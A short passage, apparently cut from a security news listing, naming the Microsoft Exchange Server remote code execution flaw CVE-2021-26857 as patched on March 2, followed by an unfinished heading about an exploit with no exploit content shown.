Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (P
Exploit for Vulnerability in Microsoft
